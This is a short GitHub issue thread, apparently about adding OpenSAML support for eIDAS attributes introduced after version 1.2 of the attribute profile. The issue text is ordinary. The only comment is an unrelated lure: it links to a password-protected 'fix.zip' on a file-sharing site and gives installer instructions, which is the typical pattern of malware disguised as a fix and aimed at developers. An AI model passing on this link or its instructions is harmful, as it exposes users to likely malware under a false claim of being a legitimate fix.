### ISSUE TITLE
Add support for new optional attributes introduced since 1.2 of the attribute profile

### ISSUE THREAD

**Issue by martin-lindstrom** [swedenconnect/opensaml-eidas#11]
Additional attributes have been added since version 1.2 of the eIDAS Attribute profile. We should add OpenSAML support for these attributes.

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
